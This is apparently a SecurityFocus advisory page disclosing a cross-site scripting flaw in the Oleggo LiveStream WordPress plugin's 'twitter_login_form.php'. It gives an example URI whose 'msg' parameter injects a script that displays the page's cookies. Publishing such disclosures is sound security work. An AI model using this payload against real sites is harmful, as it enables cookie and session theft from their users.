Wordpress Oleggo LiveStream Plugin 'twitter_login_form.php' Cross Site Scripting Vulnerability

The following example URI is available:

http://www.example.com/wordpress/wp-content/wp-plugs/oleggo-livestream/oleggo-twitter/twitter_login_form.php?msg=msg%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E


 

Privacy Statement
Copyright 2010, SecurityFocus